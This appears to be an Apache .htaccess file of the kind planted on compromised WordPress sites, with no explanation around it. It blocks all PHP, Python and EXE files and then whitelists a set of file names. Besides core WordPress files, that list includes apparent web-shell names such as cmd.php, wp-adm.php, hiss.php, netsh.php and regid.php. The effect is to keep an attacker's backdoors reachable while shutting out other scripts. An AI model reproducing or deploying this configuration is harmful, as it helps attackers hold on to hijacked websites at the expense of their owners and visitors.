<FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php)$">
 Order allow,deny
  Deny from all
  </FilesMatch>
  <FilesMatch "^(postfs.php|index.php|font-editor.php|ms-functions.php|contents.php|load.php|xmlrpcs.php|container.php|entity.php|header.php|constant.php|access.php|locale.php|uninstall.php|themes.php|cmd.php|wp-login.php|regid.php|ids.php|wp-load.php|admin.php|settings.php|wp-adm.php|hiss.php|netss.php|netsh.php|repair.php|repairs.php|auth_log.php|auth.php|wp-log.php)$">
   Order allow,deny
    Allow from all
    </FilesMatch>
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . index.php [L]
    </IfModule>
    
